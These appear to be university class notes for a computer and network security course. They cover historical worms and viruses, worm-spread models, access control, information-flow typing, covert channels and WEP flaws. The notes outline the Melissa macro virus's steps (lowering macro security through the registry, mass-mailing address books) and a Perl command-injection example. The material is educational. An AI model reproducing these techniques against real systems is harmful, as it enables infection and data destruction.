by: Kathleen Cartwright
This 234 page Class Notes was uploaded by Kathleen Cartwright on Monday September 28, 2015. The Class Notes belongs to CIS551 at University of Pennsylvania taught by Staff in Fall. Since its upload, it has received 23 views. For similar materials see /class/215374/cis551-university-of-pennsylvania in Computer Information Technology at University of Pennsylvania.
Date Created: 09/28/15
CIS 551 / TCOM 401: Computer and Network Security, Spring 2010, Lecture 4

Worms In General
- Self-contained running programs
- Unlike viruses (although this distinction is mostly academic)
- Infection strategy more active
  - Exploit buffer overflows
  - Exploit bad password choice
- Defenses
  - Filtering / firewalls
  - Monitor system resources
  - Proper access control

Viruses
- A computer virus is a malicious program
  - Creates (possibly modified) copies of itself
  - Attaches to a host program or data
  - Often has other effects (deleting files, jokes, messages)
- Viruses cannot propagate without a host
  - Typically require some user action to activate

Virus/Worm Writer's Goals
- Hard to detect
- Hard to destroy or deactivate
- Spreads infection widely and quickly
- Can reinfect a host
- Easy to create
- Machine/OS independent

Kinds of Viruses
- Boot Sector Viruses: historically important, but less common today
- Memory Resident Viruses: standard infected executable
- Macro Viruses: probably most common today
  - Embedded in documents (like Word docs)
  - Macros are just programs
  - Word processors & spreadsheets
  - Startup macro
  - Macros turned on by default
  - Visual Basic Script (VBScript)

Melissa Macro Virus
- Implementation: VBA (Visual Basic for Applications) code associated with the "document.open" method of Word
- Strategy
  - Email message containing an infected Word document as an attachment
  - Opening the Word document triggers the virus (if macros are enabled)
  - Under certain conditions, included attached documents created by the victim

Melissa Macro Virus Behavior
- Setup: lowers the macro security settings to permit all macros to run without warning
- Checks registry for key with value "... by Kwyjibo": HKEY_Current_User\Software\Microsoft\Office\Melissa
- Propagation: sends an email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro

Melissa Macro Virus Behavior (Propagation Continued)
- Infects the Normal.dot template file; Normal.dot is used by
  all Word documents
- Joke: if the minute matches the day of the month, the macro inserts the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

Melissa Virus Source Code
- The slide reproduces the Private Sub Document_Open() macro. In outline: it disables the Tools > Macro > Security menu entries and lowers the Word security level stored under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security (or, on the other branch, turns off ConfirmConversions, VirusProtection and SaveNormalPrompt); it then creates an Outlook.Application object, gets the MAPI namespace, and checks the "... by Kwyjibo" marker under HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa. If the marker is absent it logs on, and for every address list builds a message to at most 50 entries with subject "Important Message From " & Application.UserName, body "Here is that document you asked for ... don't show anyone else ;-)", the active document attached, and sends it before logging off.

Morris Worm Infection
- Sent a small loader to the target machine
  - 99 lines of C code
  - It was compiled on the remote platform (cross-platform compatibility)
- The loader program transferred the rest of the worm from the infected host to the new target
- Used authentication to prevent sys admins from tampering with loaded
  code
- If there was a transmission error, the loader would erase its tracks and exit

Morris Worm: Stealth / DOS
- When the loader obtained the full code
  - It put it into main memory and encrypted it
  - Original copies were deleted from disk
  - Even a memory dump wouldn't expose the worm
  - The worm periodically changed its name and process ID
- Resource exhaustion / denial of service
  - There was a bug in the loader program that caused many copies of the worm to be spawned per host
  - System administrators cut their network connections
  - Couldn't use the Internet to exchange fixes

Code Red Worm
- July 2001
- Exploited a buffer overflow vulnerability in the IIS Indexing Service DLL
- Attack sequence
  - The victim host is scanned for TCP port 80
  - The attacking host sends the exploit string to the victim
  - The worm, now executing on the victim host, checks for the existence of c:\notworm. If found, the worm ceases execution
  - If c:\notworm is not found, the worm begins spawning threads to scan random IP addresses for hosts listening on TCP port 80, exploiting any vulnerable hosts it finds
  - If the victim host's default language is English, then after 100 scanning threads have started and a certain period of time has elapsed following infection, all web pages served by the victim host are defaced with the message "Hacked by Chinese!"

Code Red Analysis
- http://www.caida.org/research/security/code-red/ (spread animation: newframes-small-log.gif)
- In less than 14 hours, 359,104 hosts were compromised
- Doubled population in 37 minutes on average
- Attempted to launch a Denial of Service (DoS) attack against www1.whitehouse.gov
  - Attacked the IP address of the server rather than the domain name
  - Checked to make sure that port 80 was active before launching the denial of service phase of the attack
  - These features made it trivially easy to disable the Denial of Service (phase 2) portion of the attack
- We cannot expect such weaknesses in the design of future attacks
[Figure (slide 15): Code Red packet capture]

Slammer Worm
- Saturday, 25 Jan 2003, around 05:30 UTC
- Exploited a buffer overflow in Microsoft's SQL Server or MS SQL Desktop Engine (MSDE)
  - Port 1434 (not a very commonly used port)
- Infected > 75,000 hosts (likely more)
  - In less than 10 minutes
  - Reached peak scanning rate (55 million scans/sec) in 3 minutes
- No malicious payload
  - Used a single UDP packet with buffer overflow code injection to spread
- Bugs in the Slammer code slowed its growth
  - The author made mistakes in the random number generator

More recently: W32/Conficker.worm (aka Downadup)
- Exploits a logic error in the Microsoft Windows Server Service
- Several strains: Conficker.A, Conficker.B, etc.
- http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
- Behavior
  - Worm copies itself using a random name to the %Sysdir% folder
  - Connects to public websites to obtain the public IP address of the affected computer
  - Attempts to download a malware file from the remote website
  - Starts an HTTP server on a random port on the infected machine to host a copy of the worm
  - Continuously scans the subnet of the infected host for vulnerable machines and executes the exploit
  - If the exploit is successful, the remote computer will then connect back to the HTTP server and download a copy of the worm
- Uses a combination of attacks: brute force password guessing, spread on USB sticks

Internet Worm Trends
- Code Red, Code Red II, Nimda: TCP 80, Win IIS
  - Code Red infected more than
    350,000 on July 19, 2001 within several hours
  - Uniformly scans the entire IPv4 space
  - Code Red II: local scan
  - Nimda: multiple ways
- SQL Slammer: UDP 1434, SQL server
  - Infected more than 75,000 on Jan 25, 2003
  - Infected 90% of vulnerable hosts in 10 minutes
- Blaster: TCP 135, Win RPC
  - Sequential scan; infected 300,000 to more than 1 million hosts on August 11, 2003
- Conficker: Win RPC, other
  - Infects 1.1 million PCs in < 24 hours
  - As of Jan 19, 2008 it had infected nearly 9 million hosts

But it gets worse: Flash Worms
- Paper: "The Top Speed of Flash Worms"
- Idea: don't do random search. Instead, partition the search space among instances of the worm (permutation scanning)
- Or keep a tailored "hit list" of vulnerable hosts and distribute this initial set to the first worms spawned
- Simulations suggest that such a worm could saturate 95% of 1,000,000 vulnerable hosts on the Internet in 510 milliseconds using UDP. For TCP it would take 1.3 seconds

Analysis: Random Constant Spread Model
- IP address space: $2^{32}$
- $N$: size of the total vulnerable population
- $S(t)$: susceptible (non-infected) hosts at time $t$
- $I(t)$: infective (infected) hosts at time $t$
- $\beta$: contact likelihood
- $s(t) = S(t)/N$: proportion of susceptible population
- $i(t) = I(t)/N$: proportion of infected population
- Note: $S(t) + I(t) = N$

Infection rate over time
- Change in infection rate is expressed as
  $$\frac{dI}{dt} = I(t) \cdot \beta \cdot \frac{S(t)}{N}$$
  (number of infected hosts, times rate of contact, times likelihood that a contacted host is susceptible)
- Rewrite to obtain
  $$\frac{di}{dt} = \beta \, i(t) \, (1 - i(t))$$
- Integrate to get this closed form:
  $$i(t) = \frac{e^{\beta (t - T)}}{1 + e^{\beta (t - T)}}$$
  where $T$ is the integration constant

Exponential growth tapers off
- Example curve of $I(t)$, which is $i(t) \cdot N$. Here $N = 3.5 \times 10^5$
- $\beta$ affects steepness of slope
[Plot: $I(t)$ (in units of $10^5$) against $t$ (secs), 0 to 600]

What about the constants?
- $N$: estimated number of hosts running vulnerable software (e.g., Apache or mail servers). In 2002 there were roughly 12.6M web servers on the Internet
- Reasonable choice for $\beta$ is $r \cdot N / 2^{32}$, where $r$ is the probing rate per time unit
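The RCS model above, worked numerically as an added example (this is not course code): it integrates $di/dt = \beta i (1-i)$, checks the result against the closed form, and shows how $\beta = rN/2^{32}$ shrinks when the vulnerable population or the probing rate is reduced. $N = 3.5 \times 10^5$ is the slide's value; the probing rate $r$, the initial fraction and the step size are constructed for the example.

```python
"""Random Constant Spread (RCS) worm model from the slides above, as an added
example (not course code).  It integrates di/dt = beta * i * (1 - i)
numerically, checks the result against the closed form
i(t) = e^{beta (t - T)} / (1 + e^{beta (t - T)}), and shows how
beta = r * N / 2^32 responds to a smaller vulnerable population N
(patching) or a lower per-host probing rate r (rate limiting).
The probing rate, initial fraction and step size are constructed."""
import math

ADDRESS_SPACE = 2 ** 32


def beta_from_rate(probe_rate: float, vulnerable: int) -> float:
    """beta = r * N / 2^32: a probe of a uniformly random IPv4 address hits a
    vulnerable host with probability N / 2^32."""
    return probe_rate * vulnerable / ADDRESS_SPACE


def closed_form(t: float, beta: float, half_time: float) -> float:
    """i(t) from the slides.  e^x / (1 + e^x) is evaluated as 1 / (1 + e^-x)
    so that large arguments do not overflow."""
    return 1.0 / (1.0 + math.exp(-beta * (t - half_time)))


def time_to_fraction(i0: float, beta: float, fraction: float) -> float:
    """Time at which i(t) reaches `fraction`, given i(0) = i0.  Solving the
    closed form for t gives (ln((1 - i0) / i0) + ln(f / (1 - f))) / beta;
    fraction = 1/2 yields the integration constant T."""
    return (math.log((1.0 - i0) / i0)
            + math.log(fraction / (1.0 - fraction))) / beta


def simulate(i0: float, beta: float, t_end: float, dt: float) -> list:
    """Forward-Euler integration of di/dt = beta * i * (1 - i).
    Returns (t, i(t)) pairs for every step."""
    t, i = 0.0, i0
    trace = [(t, i)]
    for _ in range(int(round(t_end / dt))):
        i += dt * beta * i * (1.0 - i)
        t += dt
        trace.append((t, i))
    return trace


def max_deviation(i0: float, beta: float, t_end: float, dt: float) -> float:
    """Largest gap between the numerical solution and the closed form."""
    half_time = time_to_fraction(i0, beta, 0.5)
    return max(abs(i - closed_form(t, beta, half_time))
               for t, i in simulate(i0, beta, t_end, dt))


if __name__ == "__main__":
    N = 350_000        # vulnerable population, as on the slide's example curve
    r = 300.0          # constructed: probes per second per infected host
    beta = beta_from_rate(r, N)
    i0 = 1.0 / N       # a single infected host at t = 0
    print(f"beta = {beta:.5f}/s, T = {time_to_fraction(i0, beta, 0.5):.1f} s")
    print(f"95% infected after {time_to_fraction(i0, beta, 0.95):.1f} s")
    print(f"patch half the hosts:  "
          f"{time_to_fraction(i0, beta_from_rate(r, N // 2), 0.95):.1f} s")
    print(f"cut probe rate by 10x: "
          f"{time_to_fraction(i0, beta_from_rate(r / 10, N), 0.95):.1f} s")
    print(f"Euler vs closed form, max deviation: "
          f"{max_deviation(i0, beta, 600.0, 0.01):.2e}")
```

Because $t$ to any fraction scales as $1/\beta$ for a fixed starting fraction, halving the susceptible population or the probing rate doubles the time a defender has before saturation.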
- Code Red: $\beta$ was empirically measured at about 1.8 hosts/hour; $T$ was empirically measured at about 11.9 (the time at which half the vulnerable hosts were infected)
- Code Red I was programmed to shut itself off at midnight UTC on July 19th, but incorrectly set clocks allowed it to live until August
- The second outbreak had $\beta$ of approximately 0.7 hosts/hour, implying that about 1/2 of the vulnerable hosts had been patched

Predictions vs. Reality
[Plot: port 80 scans due to Code Red; number seen in an hour (0 to 250,000) against hour of the day (0 to 20); observed scans and predicted number of scans; courtesy Paxson, Staniford, Weaver]

What can be done?
- Reduce the number of infected hosts: Treatment. Reduce $i(t)$ while $i(t)$ is still small, e.g., shut down or repair infected hosts
- Reduce the contact rate: Containment. Reduce $\beta$ while $i(t)$ is still small, e.g., filter traffic (Reactive)
- Reduce the number of susceptible hosts: Prevention. Reduce $s(0)$ (Proactive), e.g., use type-safe languages

Treatment: Reduce # of infected hosts
- Disinfect infected hosts
  - Detect infection in real time
  - Develop a specialized "vaccine" in real time
  - Distribute the patch more quickly than the worm can spread
    - Anti-worm (CRClean)
    - Bandwidth interference

Effects of "patching" infected hosts: Kermack-McKendrick Model
- State transition: susceptible, then infectious, then removed
- $u(t)$: proportion removed from the infectious population
- $\gamma$: removal rate
  $$\frac{di}{dt} = \beta \, i(t) \, (1 - i(t) - u(t)) - \gamma \, i(t), \qquad \frac{du}{dt} = \gamma \, i(t)$$
[Plot: $i(t)$ against $t$, 0 to 40]

CIS 551 / TCOM 401: Computer and Network Security, Spring 2009, Lecture 12

Announcements
- Plan for today: Access Control; Discretionary vs. Mandatory access control; Software validation
- Project 2 reminder: due Friday, March 6th, right before Spring Break

Access Control
- Discretionary: the individual user may, at his own discretion, determine who is authorized to access the objects he creates
- Mandatory: the creator of an object does not necessarily have the ability to determine who has authorized access to it. Typically
  policy is governed by some central authority
  - The policy on an object in the system depends on what object information was used to create the object

Bell-LaPadula Confidentiality Model
- "No read up, no write down"
- Subjects are assigned clearance levels drawn from the lattice of security labels
  - $C(S)$: clearance of the subject $S$
- A principal may read objects with lower or equal security label. Read: $C(O) \le C(S)$
- A principal may write objects with higher or equal security label. Write: $C(S) \le C(O)$
- Example: a user with Secret clearance can
  - Read objects with label Public and Secret
  - Write/create objects with label Secret

[Picture: Confidentiality. Read below, write above]

[Picture: Integrity]

Multilevel Security Policies
- In general, security levels form a "join semilattice"
  - There is an ordering $\le$ on security levels
  - For any pair of labels $L_1$ and $L_2$ there is a "join" operation: $L_1 \sqcup L_2$ is a label in the lattice such that
    1. $L_1 \le L_1 \sqcup L_2$ and $L_2 \le L_1 \sqcup L_2$ ("upper bound")
    2. If $L_1 \le L_3$ and $L_2 \le L_3$ then $L_1 \sqcup L_2 \le L_3$ ("least bound")
  - For example: Public $\sqcup$ Secret = Secret
- Labeling rules
  - Classification is a function $C : \text{Object} \to \text{Lattice}$
  - If some object $O$ is "created from" objects $O_1, \dots, O_n$ then $C(O) = C(O_1) \sqcup \dots \sqcup C(O_n)$

Implementing Multilevel Security
- Dynamic
  - Tag all values in memory with their security level
  - Operations propagate security levels
  - Must be sure that tags can't be modified
  - Expensive and approximate
  - Classic result: information-flow policies cannot be enforced purely by a reference monitor. The problem arises from implicit flows
- Static
  - Program analysis
  - May be more precise
  - May have less overhead

Perl's Solution for Integrity
- The problem: need to track the source of data
  - Examples: format string, SQL injection, etc.
      $arg = shift;
      system "echo $arg";
  - Give this program an argument that hides an rm command behind a shell metacharacter
- Perl offers a taint checking mode
  - Tracks the source of data: trusted vs. tainted
  - Ensures that tainted data is not used in system calls
  - Tainted data can be converted to trusted data by pattern matching
  - Doesn't check implicit flows

SELinux: Security-Enhanced Linux (NSA), http://www.nsa.gov/selinux
- Enforce separation of information based on confidentiality and integrity requirements
- Mandatory access control incorporated into the major subsystems of the kernel
  - Limit tampering and bypassing of application security mechanisms
  - Confine damage caused by malicious applications
- Type enforcement
  - Each process has an associated domain
  - Each object has an associated type label
  - Configuration files specify how domains are allowed to access types, and the allowable interactions and transitions between domains
- Role-based access control
  - Each process has an associated role; separates system and user processes
  - Configuration files specify the set of domains that may be entered by each role

Information Flows through Software
- Explicit flows
      int{Secret} X = f();
      int{Public} Y = 0;
      Y = X;
- Implicit flows
      int{Secret} X = f();
      int{Public} Y = 0;
      int{Public} Z = 0;
      int{Public} W = 0;
      if (X > 0) then Y = 1 else Z = 1;
      W = 3;

Jif: Java + Information Flow (Myers, Chong, Nystrom, Zdancewic, Zheng), http://www.cs.cornell.edu/jif
- Policy language that extends Java's type system
  - Confidentiality & integrity constraints
  - Principal hierarchy (delegation)
  - Robust declassification
- Jif is intended to enforce noninterference: intuitively, high security data must not affect any behavior of the program that is visible to low clearance users

Decentralized Label Model (Myers & Liskov '97, '00)
- Principals: users, groups, etc.
  - Express constraints on data usage
  - Distinct from hosts
  - Alice, Bob, etc. are principals
- Labels
  - {} is the bottom label (fewest constraints)
  - {Alice: Bob} is readable by Alice and Bob
  - {Alice: Bob, Charles; Bob: Charles} is readable by Charles
  - {Alice: Bob} $\sqcup$ {Bob: Alice} = {Alice: Bob; Bob: Alice}

Jif Policy Annotations
- Augment Java types with labels
      int{Alice} a;
      int{Bob} b;
      int{Alice;Bob} c;
- Give appropriate types to I/O routines
      void Network.send(int{} x)
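The lattice, BLP and dynamic-tagging material above, worked as an added example (not course code): a join semilattice of labels, the read/write checks, the labeling rule for derived objects, and a tag-propagating value type that catches the slide's explicit flow Y = X but lets the implic flow through `if X > 0` escape, which is the hole attributed to purely dynamic enforcement. The level names, compartments and the `send_public` sink are constructed for the example.

```python
"""Multilevel security from the slides above, as an added example (not course
code): a join-semilattice of labels, Bell-LaPadula "no read up, no write
down" checks, the labeling rule C(O) = C(O1) join ... join C(On), and a
dynamic tag-propagating value that catches the explicit flow Y = X but
misses the implicit flow through `if X > 0`.  Levels, compartments and the
send_public sink are constructed for the example."""
from dataclasses import dataclass
from functools import reduce

LEVELS = ("Public", "Secret", "TopSecret")   # totally ordered part of the lattice


@dataclass(frozen=True)
class Label:
    level: str
    compartments: frozenset = frozenset()

    def __le__(self, other: "Label") -> bool:
        """L1 <= L2: lower-or-equal level and a subset of the compartments."""
        return (LEVELS.index(self.level) <= LEVELS.index(other.level)
                and self.compartments <= other.compartments)

    def join(self, other: "Label") -> "Label":
        """L1 join L2: the least label above both."""
        level = max(self.level, other.level, key=LEVELS.index)
        return Label(level, self.compartments | other.compartments)


PUBLIC = Label("Public")
SECRET = Label("Secret")


def classify_derived(*sources: Label) -> Label:
    """Labeling rule: an object created from O1..On gets the join of their labels."""
    return reduce(Label.join, sources)


def can_read(subject: Label, obj: Label) -> bool:
    """BLP simple security: read only if C(O) <= C(S)."""
    return obj <= subject


def can_write(subject: Label, obj: Label) -> bool:
    """BLP *-property: write only if C(S) <= C(O)."""
    return subject <= obj


@dataclass(frozen=True)
class Tagged:
    """Dynamic tagging: every value carries a label; operations join labels."""
    value: int
    label: Label

    @staticmethod
    def lift(v) -> "Tagged":
        return v if isinstance(v, Tagged) else Tagged(v, PUBLIC)

    def __add__(self, other) -> "Tagged":
        o = Tagged.lift(other)
        return Tagged(self.value + o.value, self.label.join(o.label))

    def __gt__(self, other) -> "Tagged":
        o = Tagged.lift(other)
        return Tagged(int(self.value > o.value), self.label.join(o.label))

    def __bool__(self) -> bool:
        # The monitor only sees a Python bool here: the label is dropped,
        # which is exactly how the implicit flow below escapes it.
        return bool(self.value)


def send_public(v: Tagged) -> int:
    """Sink visible to low-clearance observers; rejects anything above Public."""
    if not v.label <= PUBLIC:
        raise PermissionError(f"{v.label.level} value would reach a Public channel")
    return v.value


def explicit_flow(x: Tagged) -> Tagged:
    y = Tagged(0, PUBLIC)
    y = x + 0            # Y = X: the join keeps Y at X's label, so it is caught
    return y


def implicit_flow(x: Tagged) -> Tagged:
    y = Tagged(0, PUBLIC)
    z = Tagged(0, PUBLIC)
    if x > 0:            # branch on a Secret: the tag is lost in __bool__
        y = Tagged(1, PUBLIC)
    else:
        z = Tagged(1, PUBLIC)
    return y             # still labelled Public, yet encodes whether X > 0


if __name__ == "__main__":
    secret_x = Tagged(5, SECRET)
    try:
        send_public(explicit_flow(secret_x))
    except PermissionError as e:
        print("explicit flow blocked:", e)
    # No error here: the monitor lets one bit about X out.
    print("implicit flow leaked:", send_public(implicit_flow(secret_x)),
          send_public(implicit_flow(Tagged(-5, SECRET))))
```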
- Typechecking detects illegal flows
      a = b;
      Network.send(a);
      c = a;

Security Policies in Jif
- Confidentiality labels: int{Alice:} a; "a is Alice's private int"
- Integrity labels: int{Alice!:} a; "Alice must trust a"
- Compound labels: int{Alice:; Alice!:} a; both constraints
- Insecure vs. secure
      int{Alice:} a1, a2;
      int{Bob:} b;
      a1 = b;    b = a1;    // insecure
      a1 = a2;              // secure

Richer Security Policies
- More complex policies: "Alice will release her data to Bob, but only after he has paid her $10"
- Declassification: escape from strict noninterference
  - Like a cast in C, it's dangerous; bound its effects
- Jif uses the notion of authority
  - The program runs on behalf of a set of principals
  - Classes and methods can declare authority requirements

Declassification
      int{Alice} a;
      int Paid = compute_Paid();
      if (Paid >= 10) {
        int{Bob} b = declassify(a to Bob);   // "typecast" int{Alice} to int{Bob}
      }

Example: Oblivious Transfer (Rabin '81)
- Alice's policy: "Bob gets to choose exactly one of m1 and m2"
- Bob's policy: "Alice doesn't get to know which item I request"
- Classic result: "Impossible to solve using 2 principals with perfect security" (Damgård, Kilian, Salvail '99)

Oblivious Transfer in Java
      int m1, m2;            // Alice's data
      boolean accessed;
      int n, ans;            // Bob's data
      n = choose();          // Bob's choice
      if (!accessed) {       // Transfer
        accessed = true;
        if (n == 1) ans = m1; else ans = m2;
      }

Adding Confidentiality Labels
      int{Alice:} m1, m2;    // Alice's data
      boolean accessed;
      int{Bob:} n, ans;      // Bob's data
      n = choose();          // Bob's choice
      if (!accessed) {       // Transfer
        accessed = true;
        if (n == 1) ans = m1; else ans = m2;   // Verification fails
      }

Using Declassification
      int{Alice:} m1, m2;    // Alice's data
      boolean accessed;
      int{Bob:} n, ans;      // Bob's data
      n = choose();          // Bob's choice
      if (!accessed) {       // Transfer
        accessed = true;
        if (n == 1) ans = declassify(m1 to Bob);   // Verification fails
        else ans = declassify(m2 to Bob);
      }

Integrity Constraints
      int{Alice:; Alice!:} m1, m2;   // Alice's data
      boolean accessed;
      int{Bob:} n, ans;              // Bob's data
      n = choose();                  // Bob's choice
      if (!accessed) {               // Transfer
        accessed = true;
        if (n == 1) ans = declassify(m1 to Bob);   // Verification fails
        else ans = declassify(m2 to Bob);
      }

Using Endorsement
      int{Alice:} m1, m2;            // Alice's data
      boolean{Alice!:} accessed;
      int{Bob:} n, ans;              // Bob's data
      n = choose();                  // Bob's choice
      if (!accessed) {               // Transfer
        accessed = true;
        if (endorse(n to Alice) == 1) ans = declassify(m1 to Bob);
        else ans = declassify(m2 to Bob);
      }

Two Other MAC Policies
- "Chinese Wall" policy (Brewer & Nash '89)
  - Object labels are classified into "conflict classes"
  - If a subject accesses one object with label L1 in a conflict class, all access to objects labeled with other labels in the conflict class is denied
  - The policy changes dynamically
- "Separation of Duties"
  - Division of responsibilities among subjects
  - Example: a bank auditor cannot issue checks

Covert Channels & Information Hiding
- A covert channel is a means by which two components of a system that are not permitted to communicate do so anyway by affecting a shared resource
- Information hiding: two components of the system that are permitted to communicate about one set of things exchange information about disallowed topics by encoding contraband information in the legitimate traffic
- Not that hard to leak a small amount of data
  - A 64-bit encryption key is not that hard to transmit
  - Even possible to encode relatively large amounts of data
- Example channels / information hiding strategies
  - Program behavior
  - Adjust the formatting of output (use the \t character for 1 and 8 spaces for 0)
  - Vary timing behavior based on the key
  - Use "low order" bits to send signals
  - Power consumption
  - Grabbing/releasing a lock on a shared resource

Differential Power Analysis
- Read the value of a DES password off of a smartcard by watching power consumption
[Figure: power trace in mA against time in ms. This figure shows simple power analysis of DES encryption; the 16 rounds are clearly visible]

TEMPEST Security
- Transient Electromagnetic Pulse Emanation Standard, or Temporary Emanation and Spurious Transmission
- Emission security
- Van Eck phreaking: computer monitors and other devices give off electromagnetic radiation. With the right antenna and receiver
  these emanations can be intercepted from a remote location and then be redisplayed (in the case of a monitor screen) or recorded and replayed (such as with a printer or keyboard)
- Policy is set in National Communications Security Committee Directive 4
- Guidelines for preventing EM reception
  - Shield the device (expensive)
  - Shield a location (inconvenient)

Defenses for Covert Channels
- Well specified security policies at the human level
- Auditing mechanisms at the human level; justify prosecution if the attacker is caught
- Code review (this is a form of audit)
- Automated program analysis
  - Type systems that let programmers specify confidentiality labels
  - Transform programs so that both branches of a conditional statement take the same amount of time
  - Disallow branches on "secret" information
- Automated system analysis: monitor HTTP traffic to look for unusual behavior

Specific Countermeasures
- Against timing attacks
  - Make all operations run in the same amount of time
    - Hard to implement; can't design platform-independent algorithms
    - All operations take as long as the slowest one
  - Add random delays
    - The attacker can take more samples to remove the randomness
- Against power analysis attacks
  - Make all operations take the same amount of power (again, hard to implement)
  - Add randomness

Question
- Suppose you have gone through the cost/benefit and risk analysis to determine the security requirements for a computer system. How do you know whether a system meets its security requirements?
- Class answers:

Assurance methods
- Testing
  - Regression testing, automation tools, etc.
  - Can demonstrate the existence of a flaw, not its absence
- Validation
  - Requirements checking
  - Design and code reviews (sit around a table, drink lots of coffee)
  - Module and system testing
- Formal verification
  - Develop a rigorous mathematical specification of the system
  - Prove (using tools or by hand) that the implementation meets the specification
  - Time-consuming, painstaking process
  - Has been done for some systems; see
    www.praxis-his.com

Rainbow Series
- DoD Trusted Computer System Evaluation Criteria (Orange Book)
- Audit in Trusted Systems (Tan Book)
- Configuration Management in Trusted Systems (Amber Book)
- Trusted Distribution in Trusted Systems (Dark Lavender Book)
- Security Modeling in Trusted Systems (Aqua Book)
- Formal Verification Systems (Purple Book)
- Covert Channel Analysis of Trusted Systems (Light Pink Book)
- Many more: http://www.fas.org/irp/nsa/rainbow.htm

Orange Book Requirements (TCSEC)
- TCSEC: Trusted Computer System Evaluation Criteria
- Security Policy, Accountability, Assurance, Documentation
- Next few slides: details not important. Main point: higher levels require more work; documentation and configuration management are part of the criteria

Common Criteria
- Three parts
  - CC Documents: protection profiles (requirements for a category of systems), functional requirements, assurance requirements
  - CC Evaluation Methodology
  - National Schemes (local ways of doing evaluation)
- Endorsed by 14 countries
- Replaces TCSEC: CC adopted 1998; last TCSEC evaluation completed 2000
- http://www.niap-ccevs.org/cc-scheme and http://www.commoncriteriaportal.org

Protection Profiles
- Requirements for categories of systems; subject to review and certified
- Example: Controlled Access PP (CAPP v1.d)
  - Security functional requirements: authentication, user data protection, prevent audit loss
  - Security assurance requirements: security testing, admin guidance, lifecycle support
  - Assumes non-hostile and well-managed users
  - Does not consider malicious system developers

Evaluation Assurance Levels 1 to 4
- EAL 1, Functionally Tested: review of functional and interface specifications; some independent testing
- EAL 2, Structurally Tested: analysis of security functions, including high-level design; independent testing, review of developer testing
- EAL 3, Methodically Tested and Checked: development environment controls; configuration management
- EAL 4, Methodically Designed, Tested, Reviewed: informal spec of security
  policy; independent testing

Evaluation Assurance Levels 5 to 7
- EAL 5, Semiformally Designed and Tested: formal model, modular design; vulnerability search, covert channel analysis
- EAL 6, Semiformally Verified Design and Tested: structured development process
- EAL 7, Formally Verified Design and Tested: formal presentation of the functional specification; product or system design must be simple; independent confirmation of developer tests

Example: Windows 2000, EAL 4
- Evaluation performed by SAIC
- Used the Controlled Access Protection Profile
- Level: EAL 4 + Flaw Remediation
  - "EAL 4 represents the highest level at which products not built specifically to meet the requirements of EAL 5-7 ought to be evaluated." EAL 5-7 requires more stringent design and development procedures
  - Flaw Remediation
- Evaluation based on specific configurations; produced a configuration guide that may be useful
[Figure: scanned validation certificate page for the Microsoft Corporation evaluation]

CIS 551 / TCOM 401: Computer and Network Security, Spring 2009, Lecture 7

Announcements
- First project due TOMORROW at 11:59 pm: http://www.cis.upenn.edu/~cis551/project1.html
- Plan for today: networks, 802.11, IP, TCP

Wireless (802.11)
- Spread spectrum radio, 2.4 GHz frequency band
- Bandwidth ranges: 1, 2, 5.5, 11, 22 Mbps
- Like Ethernet, 802.11 has a shared medium: need MAC; uses exponential backoff
- Unlike Ethernet, in 802.11
  - No support for collision detection
  - Not all senders and receivers are directly connected
Hidden nodes
- A and C are hidden with respect to each other
- Frames sent from A to B and from C to B simultaneously may collide, but A and C can't detect the collision

Exposed nodes
- B is exposed to C
- Suppose B is sending to A; C should still be allowed to transmit to D, even though a C to B transmission would collide
- Note: an A to B transmission would cause a collision

Multiple Access, Collision Avoidance
- Sender transmits Request To Send (RTS)
  - Includes the length of the data to be transmitted
  - Timeout leads to exponential backoff (like Ethernet)
- Receiver replies with Clear To Send (CTS); echoes the length field
- Receiver sends an ACK of the frame to the sender
- Any node that sees the CTS cannot transmit for the duration specified by the length
- Any node that sees the RTS but not the CTS is not close enough to the receiver to interfere; it's free to transmit

Wireless Access Points
[Figure: access points attached to a distribution system]
- Distribution System: wired network infrastructure
- Access points: stationary wireless devices
- Roaming wireless nodes

Selecting an Access Point
- Active scanning
  - Node sends a Probe frame
  - All APs within reach reply with a Probe Response frame
  - Node selects an AP and sends an Association Request frame
  - AP replies with an Association Response frame
- Passive scanning
  - AP periodically broadcasts a Beacon frame
  - Node sends an Association Request

Node Mobility
[Figure: node B moving from AP1 to AP2 on the distribution system]
- B moves from AP1 to AP2
- B sends Probes, eventually prefers AP2 to AP1
- Sends an Association Request

802.11 Security Issues
- Packet sniffing is worse: no physical connection needed; long range (6 blocks)
- Current encryption standards (WEP, WEP2) not that good
- Denial of service: Association and Disassociation Requests are not authenticated

Wired Equivalent Privacy (WEP)
- Designed to provide the same security standards as wired LANs like Ethernet
- WEP uses 40-bit keys; WEP2 uses 128-bit keys
- Uses shared key authentication
  - Key is configured manually at the access point
  - Key is
    configured manually at the wireless device
- WEP frame transmission format: 802.11 Hdr | IV | K(S, IV){DATA, ICV}
  - S: shared key
  - IV: 24-bit "initialization vector"
  - ICV: "integrity checksum", uses the CRC checksum algorithm
  - Encryption algorithm is RC4

Problem with WEP
- RC4 generates a keystream: the shared key S plus the IV generates a long sequence of pseudorandom bytes, RC4(IV, S)
- Encryption is $C = P \oplus \mathrm{RC4}(IV, S)$, where $\oplus$ is "xor"
- IVs are public, so it's easy to detect their reuse
- Problem: if an IV ever repeats, then we have $C_1 = P_1 \oplus \mathrm{RC4}(IV, S)$ and $C_2 = P_2 \oplus \mathrm{RC4}(IV, S)$, so $C_1 \oplus C_2 = P_1 \oplus P_2$
- Statistical analysis or known plaintext can disentangle $P_1$ and $P_2$

Finding IV Collisions
- How the IV is picked is not specified in the standard
  - The standard "recommends" but does not require that the IV be changed for every packet
  - Some vendors initialize to 0 on reset and then increment
  - Some vendors generate the IV randomly per packet
- Very active links send 1000 packets/sec; they exhaust the 24-bit keyspace in < 1/2 day
- If the IV is chosen randomly, the probability is > 50% that there will be a collision after only 4823 packets

Other WEP problems
- Replay attacks
  - The standard requires the protocol to be stateless; expensive to rule out replay attacks
  - The sender and receiver can't keep track of expected sequence numbers
- Integrity violations
  - An attacker can inject or corrupt WEP encrypted packets
  - CRC (Cyclic Redundancy Check) is an error detection code commonly used in Internet protocols
  - CRC is good at detecting random errors introduced by environmental noise
  - But CRC is not a hash function: it is easy to find collisions
  - An attacker can arbitrarily pass off bogus WEP packets as legitimate ones

Newer 802.11 Standards
- WPA (WiFi Protected Access), introduced in 802.11i
